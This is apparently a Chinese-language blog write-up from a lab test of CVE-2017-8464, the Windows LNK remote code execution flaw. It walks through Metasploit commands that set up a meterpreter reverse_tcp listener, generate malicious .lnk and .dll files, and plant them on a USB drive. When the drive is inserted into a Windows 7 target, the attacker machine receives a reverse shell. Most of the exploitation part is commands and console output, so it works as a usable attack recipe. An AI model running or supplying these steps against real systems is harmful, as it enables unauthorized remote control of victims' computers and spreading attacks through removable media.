17年的問題,最近清理以前磁盤的文件發現這個記錄文檔,寫在這裡。
引言
微軟在2017年6月中旬發佈的補丁包中包含了一個關於LNK文件遠程代碼執行的漏洞,CVE編號為CVE-2017-8464,描述如果系統處理了惡意的.LNK文件,則可能允許遠程執行代碼,成功利用這個漏洞會獲得與本地用戶相同的用戶權限,攻擊者可以通過任意可移動驅動器(如U盤)或者遠程共享的方式傳播攻擊。我們以U盤測試,當受害者主機加載該U盤即會受到攻擊,無需受害者手動點擊訪問U盤,斷開U盤shell會話保持。
當時影響任何未安裝CVE-2017-8464補丁的Windows系統,可繞過MS10-046 & MS15-020補丁防護,涉及Microsoft Windows 10、Microsoft Windows 7、Microsoft Windows 8、Microsoft Windows 8.1、Microsoft Windows Server 2008、Microsoft Windows Server 2012、Microsoft Windows Server 2016。
漏洞利用
測試環境:
攻擊機:kali 2.0(192.168.80.226)
靶機:win7 x64(192.168.80.114)
1、下載exp放在kali對應目錄(新版kali應該已經自帶了),此處以放在該測試目錄為例(kali2.0:
/usr/share/metasploit-framework/modules/exploit/windows/smb/),在kali裡配置監聽
<code>msf
>
use
exploit/multi/handler
msf
exploit(handler)
>
set
PAYLOAD
windows/x64/meterpreter/reverse_tcp
PAYLOAD
=>
windows/x64/meterpreter/reverse_tcp
msf
exploit(handler)
>
set
LHOST
192.168
.80
.226
LHOST
=>
192.168
.80
.226
msf
exploit(handler)
>
exploit
-j
[*]
Exploit
running
as
background
job.
[*]
Started
reverse
TCP
handler
on
192.168
.80
.226
:4444
msf
exploit(handler)
>
[*]
Starting
the
payload
handler...
back
/<code>
<code>msf
>
use
exploit/windows/smb/cve_2017_8464_lnk_rce
msf
exploit(cve_2017_8464_lnk_rce)
>
set
PAYLOAD
windows/x64/meterpreter/reverse_tcp
PAYLOAD
=>
windows/x64/meterpreter/reverse_tcp
msf
exploit(cve_2017_8464_lnk_rce)
>
set
LHOST
192.168
.80
.226
LHOST
=>
192.168
.80
.226
/<code>
<code>msf
exploit
(cve_2017_8464_lnk_rce) >exploit
/<code>
執行成功後會在/root/.msf4/local/*目錄生成.dll和.lnk文件
2、在kali里加載U盤,複製文件到U盤根目錄
查看加載的U盤:
將kali目錄 /root/.msf4/local/* 下的 .lnk文件複製到U盤根目錄
複製完成後的U盤根目錄
3、在靶機上插入U盤,無需手動點擊訪問U盤,靶機即可受到攻擊,測試在win7靶機中插入U盤時,kali攻擊機收到反彈的shell